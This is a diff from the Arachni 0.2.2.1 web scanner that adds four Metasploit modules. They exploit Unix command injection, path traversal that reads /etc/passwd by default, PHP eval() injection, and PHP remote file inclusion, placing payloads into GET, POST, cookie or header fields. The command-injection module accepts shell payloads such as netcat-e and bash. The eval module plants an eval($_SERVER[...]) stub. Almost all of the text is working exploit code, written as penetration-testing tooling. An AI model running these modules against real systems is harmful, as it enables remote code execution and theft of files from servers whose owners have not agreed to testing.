arachni 0.2.2.1

data/external/metasploit/modules/exploits/unix/webapp/arachni_exec.rb

@@ -0,0 +1,142 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize( info = {} )
+		super( update_info( info,
+			'Name'           => 'Generic WebApp Unix Command Execution Exploit',
+			'Description'    => %q{
+					This module allows complex HTTP requests to be crafted in order to
+				allow exploitation of command injection vulnerabilities in Unix-like platforms.
+
+				Use 'XXinjectionXX' to mark the value of the vulnerable variable/field,
+				i.e. where the payload should go.
+
+				Supported vectors: GET, POST, COOKIE, HEADER.
+				(Mainly for use with the Arachni plug-in.)
+			},
+			'Author'         => [
+				'Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>', # extended it to work with GET/POST/COOKIE/HEADER
+				'hdm' # original exploit: exploits/unix/webapp/generic_exec.rb
+			],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 10642 $',
+			'References'     =>
+				[
+					['URL', 'http://github.com/Zapotek/arachni'],
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+					'Space'       => 1024,
+					'Compat'      =>
+						{
+							'PayloadType' => 'cmd',
+							'RequiredCmd' => 'generic perl telnet netcat-e bash',
+						}
+				},
+			'Platform'       => 'unix',
+			'Arch'           => ARCH_CMD,
+			'Targets'        => [[ 'Automatic', { }]],
+			'DefaultTarget' => 0 ) )
+
+		register_options( [
+			OptString.new( 'GET',     [ false, "GET parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
+			OptString.new( 'POST',    [ false, "POST parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
+			OptString.new( 'COOKIES', [ false, "Cookies to be sent with the request. ('foo=bar;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
+			OptString.new( 'HEADERS', [ false, "Headers to be sent with the request. ('User-Agent=bar::vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
+			OptString.new( 'PATH',    [ true,  "The path to the vulnerable script.", "/cgi-bin/generic" ] ),
+		], self.class )
+	end
+
+	def check
+		uri = datastore['PATH'] ? datastore['PATH'].dup : ""
+
+		if( uri && ! uri.empty? )
+
+			uri.gsub!( /\?.*/, "" )
+
+			print_status( "Checking uri #{uri}" )
+
+			response = send_request_raw({ 'uri' => uri})
+			if response.code == 200
+				return Exploit::CheckCode::Detected
+			end
+
+			print_error( "Server responded with #{response.code}" )
+			return Exploit::CheckCode::Safe
+		else
+			return Exploit::CheckCode::Unknown
+		end
+
+	end
+
+
+	def exploit
+
+		cookies = _sub_injection( datastore['COOKIES'].to_s, ';' )
+		headers = _str_to_hash( _sub_injection( datastore['HEADERS'].to_s, '::' ), ':;' )
+		post    = _str_to_hash( _sub_injection( datastore['POST'].to_s ) )
+		get     = _str_to_hash( _sub_injection( datastore['GET'].to_s ) )
+		uri     = datastore['PATH'].to_s
+		method  = post.empty? ? 'GET' : 'POST'
+
+		if( post.empty? && get.empty? && headers.empty? && cookies.empty? )
+			print_error( 'At least one of GET/POST/COOKIES/HEADERS must be set.' )
+			return
+		end
+
+		print_status( "Sending HTTP request for #{uri}" )
+		res = send_request_cgi( {
+			'global' => true,
+			'uri'    => uri,
+			'method' => method,
+			'vars_get'  => get,
+			'vars_post' => post,
+			'headers'   => headers,
+			'cookie'    => cookies
+		}, 0.01 )
+
+		handler
+	end
+
+	#
+	# Converts a URI styled query string into a key=>value hash
+	#
+	def _str_to_hash( str, sep = '&' )
+		hash = {}
+		str.split( sep ).map do |part|
+			splits = part.split( '=', 2 )
+			next if !splits[0] || !splits[1]
+			hash[splits[0]] = splits[1]
+		end
+
+		return hash
+	end
+
+	#
+	# Substitutes 'XXinjectionXX' in values of a URI styled query string with the
+	# payload
+	#
+	def _sub_injection( str, sep = '&' )
+
+		return str.to_s.split( sep ).map do |var|
+			k,v = var.split( '=', 2 )
+			next if !v || !k
+
+			if sep == '&'
+				pl = payload.encoded
+			else
+				pl = URI.encode( payload.encoded, ';\'=$_(),-:~. ' )
+			end
+
+			k + "=" + v.gsub( 'XXinjectionXX', pl )
+		end.reject do |i| !i end.join( sep )
+	end
+
+end

data/external/metasploit/modules/exploits/unix/webapp/arachni_path_traversal.rb

@@ -0,0 +1,113 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'          => 'Arachni Path Traversal Module',
+			'Description'   => %q{
+				It exploits path traversal vulnerabilities in order to read the contents of a remote file.
+			It will also try to clean-up any HMTL code that does not belong to the file.
+
+			This module is designed to be used with the Arachni plug-in.
+			},
+			'Author'        => [
+				'Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>',
+			],
+			'License'       => BSD_LICENSE,
+			'Version'       => '$Revision: 9212 $',
+			'References'    =>
+				[
+					['URL', 'http://github.com/Zapotek/arachni']
+				]
+			))
+
+		register_options( [
+			OptString.new( 'GET',     [ false, "GET parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
+			OptString.new( 'POST',    [ false, "POST parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
+			OptString.new( 'COOKIES', [ false, "Cookies to be sent with the request. ('foo=bar;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
+			OptString.new( 'HEADERS', [ false, "Headers to be sent with the request. ('User-Agent=bar::vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
+			OptString.new( 'PATH',    [ true,  "The path to the vulnerable script.", "/cgi-bin/generic" ] ),
+			OptString.new( 'FILE',    [ true,  "The file to grab.", "/etc/passwd" ] ),
+		], self.class )
+	end
+
+	def run
+		#
+		# There must be a better way to get the diff but this is good enough for now
+		#
+		begin
+			file_orig = datastore['FILE'].dup
+			splits_file = get_file.split( /\w*$/ )
+
+			datastore['FILE'] = '/'
+
+			splits_empty = get_file.split( /\w*$/ )
+
+			print_line (splits_file - splits_empty).join
+		ensure
+			datastore['FILE'] = file_orig.dup
+		end
+
+	end
+
+	def get_file
+		cookies = _sub_injection( datastore['COOKIES'].to_s, ';' )
+		headers = _str_to_hash( _sub_injection( datastore['HEADERS'].to_s, '::' ), '::' )
+		post    = _str_to_hash( _sub_injection( datastore['POST'].to_s ) )
+		get     = _str_to_hash( _sub_injection( datastore['GET'].to_s ) )
+		uri     = datastore['PATH'].to_s
+		method  = post.empty? ? 'GET' : 'POST'
+
+		if( post.empty? && get.empty? && headers.empty? && cookies.empty? )
+			print_error( 'At least one of GET/POST/COOKIES/HEADERS must be set.' )
+			return
+		end
+
+		print_status( "Sending HTTP request for #{uri}" )
+		res = send_request_cgi( {
+			'global' => true,
+			'uri'    => uri,
+			'method' => method,
+			'vars_get'  => get,
+			'vars_post' => post,
+			'headers'   => headers,
+			'cookie'    => cookies
+		}, 0.01 )
+
+		return res.body
+	end
+
+	#
+	# Converts a URI styled query string into a key=>value hash
+	#
+	def _str_to_hash( str, sep = '&' )
+		hash = {}
+		str.split( sep ).map do |part|
+			splits = part.split( '=', 2 )
+			next if !splits[0] || !splits[1]
+			hash[splits[0]] = splits[1]
+		end
+
+		return hash
+	end
+
+	#
+	# Substitutes 'XXinjectionXX' in values of a URI styled query string with the
+	# payload
+	#
+	def _sub_injection( str, sep = '&' )
+
+		return str.to_s.split( sep ).map do |var|
+			k,v = var.split( '=', 2 )
+			next if !v || !k
+
+			k + "=" + v.gsub( 'XXinjectionXX', datastore['FILE'].to_s )
+		end.reject do |i| !i end.join( sep )
+	end
+
+
+end
+

data/external/metasploit/modules/exploits/unix/webapp/arachni_php_eval.rb

@@ -0,0 +1,150 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Generic PHP Code eval() Exploit',
+			'Description'    => %q{
+					This module allows complex HTTP requests to be crafted in order to
+				allow exploitation of PHP eval() vulnerabilities in Unix-like platforms.
+
+				Use 'XXinjectionXX' to mark the value of the vulnerable variable/field,
+				i.e. where the payload should go.
+
+				Supported vectors: GET, POST, COOKIE, HEADER.
+				(Mainly for use with the Arachni plug-in.)
+			},
+			'Author'         => [
+				'Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>', # extended it to work with GET/POST/COOKIE/HEADER
+				'egypt' # original exploit: exploits/unix/webapp/php_eval.rb
+			],
+			'License'        => BSD_LICENSE,
+			'Version'        => '$Revision: 9392 $',
+			'References'     =>
+				[
+					['URL', 'http://github.com/Zapotek/arachni'],
+				],
+			'Privileged'     => false,
+			'Platform'       => ['php'],
+			'Arch'           => ARCH_PHP,
+			'Payload'        =>
+				{
+					# max header length for Apache,
+					# http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize
+					'Space'       => 8190,
+					# max url length for some old versions of apache according to
+					# http://www.boutell.com/newfaq/misc/urllength.html
+					#'Space'       => 4000,
+					'DisableNops' => true,
+					'BadChars'    => %q|'"`|,  # quotes are escaped by PHP's magic_quotes_gpc in a default install
+					'Compat'      =>
+						{
+							'ConnectionType' => 'find',
+						},
+					'Keys'        => ['php'],
+				},
+			'Targets'        => [ ['Automatic', { }], ],
+			'DefaultTarget' => 0
+			))
+
+		register_options( [
+			OptString.new( 'GET',     [ false, "GET parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
+			OptString.new( 'POST',    [ false, "POST parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
+			OptString.new( 'COOKIES', [ false, "Cookies to be sent with the request. ('foo=bar;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
+			OptString.new( 'HEADERS', [ false, "Headers to be sent with the request. ('User-Agent=bar::vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
+			OptString.new( 'PATH',    [ true,  "The path to the vulnerable script.", "/cgi-bin/generic" ] ),
+		], self.class )
+
+	end
+
+	def check
+		uri = datastore['PATH'] ? datastore['PATH'].dup : ""
+
+		if( uri && ! uri.empty? )
+
+			uri.gsub!( /\?.*/, "" )
+
+			print_status( "Checking uri #{uri}" )
+
+			response = send_request_raw({ 'uri' => uri})
+			if response.code == 200
+				return Exploit::CheckCode::Detected
+			end
+
+			print_error( "Server responded with #{response.code}" )
+			return Exploit::CheckCode::Safe
+		else
+			return Exploit::CheckCode::Unknown
+		end
+
+	end
+
+	def exploit
+
+		headername = "X-" + Rex::Text.rand_text_alpha_upper( rand( 10 ) + 10 )
+
+		cookies = _sub_injection( datastore['COOKIES'].to_s, headername, ';' )
+		headers = _str_to_hash( _sub_injection( datastore['HEADERS'].to_s, headername, '::' ), '::' )
+		post    = _str_to_hash( _sub_injection( datastore['POST'].to_s, headername ) )
+		get     = _str_to_hash( _sub_injection( datastore['GET'].to_s, headername ) )
+		uri     = datastore['PATH'].to_s
+		method  = post.empty? ? 'GET' : 'POST'
+
+		if( post.empty? && get.empty? && headers.empty? && cookies.empty? )
+			print_error( 'At least one of GET/POST/COOKIES/HEADERS must be set.' )
+			# return
+		end
+
+		headers[headername]   = payload.encoded
+		headers['Connection'] = 'close'
+
+		print_status( "Sending HTTP request for #{uri}" )
+		res = send_request_cgi( {
+			'global' => true,
+			'uri'    => uri,
+			'method' => method,
+			'vars_get'  => get,
+			'vars_post' => post,
+			'headers'   => headers,
+			'cookie'    => cookies
+		}, 0.01 )
+
+		handler
+	end
+
+	#
+	# Converts a URI styled query string into a key=>value hash
+	#
+	def _str_to_hash( str, sep = '&' )
+		hash = {}
+		str.split( sep ).map do |part|
+			splits = part.split( '=', 2 )
+			next if !splits[0] || !splits[1]
+			hash[splits[0]] = splits[1]
+		end
+
+		return hash
+	end
+
+	#
+	# Substitutes 'XXinjectionXX' in values of a URI styled query string with the
+	# payload
+	#
+	def _sub_injection( str, headername, sep = '&' )
+
+		stub = "eval($_SERVER[HTTP_#{headername.gsub("-", "_")}]);"
+
+		stub = URI.encode( stub, ';' ) if sep != '&'
+
+		return str.to_s.split( sep ).map do |var|
+			k,v = var.split( '=', 2 )
+			next if !v || !k
+			k + "=" + v.gsub( 'XXinjectionXX', stub )
+		end.reject do |i| !i end.join( sep )
+	end
+
+end

data/external/metasploit/modules/exploits/unix/webapp/arachni_php_include.rb

@@ -0,0 +1,141 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::Remote::HttpServer::PHPInclude
+
+	def initialize( info = {} )
+		super( update_info( info,
+			'Name'           => 'Arachni Generic PHP Remote File Inclusion Exploit',
+			'Description'    => %q{
+					This module allows complex HTTP requests to be crafted in order to
+				allow exploitation of PHP remote file inclusion vulnerabilities.
+
+				Use 'XXinjectionXX' to mark the value of the vulnerable variable/field,
+				i.e. where the payload should go.
+
+				Supported vectors: GET, POST, COOKIE, HEADER.
+				(Mainly for use with the Arachni plug-in.)
+			},
+			'Author'         => [
+				'Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>', # extended it to work with GET/POST/COOKIE/HEADER
+				'hdm',  # original exploit: exploits/unix/webapp/php_include.rb
+				'egypt' # original exploit: exploits/unix/webapp/php_include.rb
+			],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 10694 $',
+			'References'     =>
+				[
+					['URL', 'http://github.com/Zapotek/arachni'],
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+					'Compat'      =>
+						{
+							'ConnectionType' => 'find',
+						},
+					# Arbitrary big number. The payload gets sent as an HTTP
+					# response body, so really it's unlimited
+					'Space'       => 262144, # 256k
+				},
+			'DefaultOptions' =>
+				{
+					'WfsDelay' => 30
+				},
+			'Platform'       => 'php',
+			'Arch'           => ARCH_PHP,
+			'Targets'        => [[ 'Automatic', { }]],
+			'DefaultTarget' => 0 ) )
+
+		register_options( [
+			OptString.new( 'GET',     [ false, "GET parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
+			OptString.new( 'POST',    [ false, "POST parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
+			OptString.new( 'COOKIES', [ false, "Cookies to be sent with the request. ('foo=bar;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
+			OptString.new( 'HEADERS', [ false, "Headers to be sent with the request. ('User-Agent=bar::vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
+			OptString.new( 'PATH',    [ true,  "The path to the vulnerable script.", "/cgi-bin/generic" ] ),
+		], self.class )
+	end
+
+	def check
+		uri = datastore['PATH'] ? datastore['PATH'].dup : ""
+
+		if( uri && ! uri.empty? )
+
+			uri.gsub!( /\?.*/, "" )
+
+			print_status( "Checking uri #{uri}" )
+
+			response = send_request_raw({ 'uri' => uri})
+			if response.code == 200
+				return Exploit::CheckCode::Detected
+			end
+
+			print_error( "Server responded with #{response.code}" )
+			return Exploit::CheckCode::Safe
+		else
+			return Exploit::CheckCode::Unknown
+		end
+
+	end
+
+	def php_exploit
+
+		cookies = _sub_injection( datastore['COOKIES'].to_s, ';' )
+		headers = _str_to_hash( _sub_injection( datastore['HEADERS'].to_s, '::' ), '::' )
+		post    = _str_to_hash( _sub_injection( datastore['POST'].to_s ) )
+		get     = _str_to_hash( _sub_injection( datastore['GET'].to_s ) )
+		uri     = datastore['PATH'].to_s
+		method  = post.empty? ? 'GET' : 'POST'
+
+		if( post.empty? && get.empty? && headers.empty? && cookies.empty? )
+			print_error( 'At least one of GET/POST/COOKIES/HEADERS must be set.' )
+			return
+		end
+
+		print_status( "Sending HTTP request for #{uri}" )
+		res = send_request_cgi( {
+			'global' => true,
+			'uri'    => uri,
+			'method' => method,
+			'vars_get'  => get,
+			'vars_post' => post,
+			'headers'   => headers,
+			'cookie'    => cookies
+		}, 0.01 )
+
+		handler
+	end
+
+	#
+	# Converts a URI styled query string into a key=>value hash
+	#
+	def _str_to_hash( str, sep = '&' )
+		hash = {}
+		str.split( sep ).map do |part|
+			splits = part.split( '=', 2 )
+			next if !splits[0] || !splits[1]
+			hash[splits[0]] = splits[1]
+		end
+
+		return hash
+	end
+
+	#
+	# Substitutes 'XXinjectionXX' in values of a URI styled query string with the
+	# payload
+	#
+	def _sub_injection( str, sep = '&' )
+
+		return str.to_s.split( sep ).map do |var|
+			k,v = var.split( '=', 2 )
+			next if !v || !k
+			k + "=" + v.gsub( 'XXinjectionXX', php_include_url )
+		end.reject do |i| !i end.join( sep )
+	end
+
+end